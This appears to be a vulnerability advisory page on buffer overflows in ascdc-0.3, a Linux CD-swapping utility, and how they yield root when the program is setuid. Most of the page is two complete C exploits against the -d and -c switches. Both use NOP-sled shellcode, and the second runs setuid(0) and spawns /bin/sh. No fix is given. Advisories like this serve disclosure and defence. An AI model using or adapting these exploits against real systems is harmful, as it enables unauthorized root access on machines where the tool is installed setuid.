Vulnerability ascdc Affected ascdc-0.3 Description The following is based on advisory WSIR-01/02-06; the vulnerability was discovered by Christer Öberg (Wkit Security). Use this bad boy to swap CD's graphically under X. There are multiple buffer overflows in ascdc that can be exploited to gain root if it is installed setuid root. It is NOT installed setuid root by default, but as the README says "If you intend to use the automounting feature, you must either run ascdc as root, or setuid it". Christer used the -d option in the exploit, but overflows also exist in the -m and -c switches. Exploit: char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0" "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80\xe8\xe6\xff\xff\xff" "Would you like to play a game? y\x0aStrange, the only winning move is not to play.\x0a"; #define bsize 600 unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int i; buff = malloc(bsize); addr = get_sp(); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < 600/2; i++) buff[i] = 0x90; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0); } 'The Itch' sent a working version of the exploit for ascdc-0.3 using the -c switch this time: /* /usr/X11R6/bin/ascdc local exploit. 
* (version: ascdc-0.3-2-i386) * * Vulnerability found by Christer Öberg, Wkit Security AB * * - The Itch / BsE * - http://bse.die.ms * - irc.axenet.org */ #include <stdio.h> #include <stdlib.h> #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 /* adjust if needed, this should be suffient */ #define DEFAULT_BUFFER_SIZE 600 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } addr = get_sp(); printf("/usr/X11R6/bin/ascdc local exploit.\n"); printf("Coded by The Itch / BsE\n\n"); printf("Using return address: 0x%x\n", addr); printf("Using buffersize : %d\n", bsize); ptr = buff; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) -1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); memcpy(buff, "RET=", 4); putenv(buff); system("/usr/X11R6/bin/ascdc -c $RET"); return 0; } Solution No information available.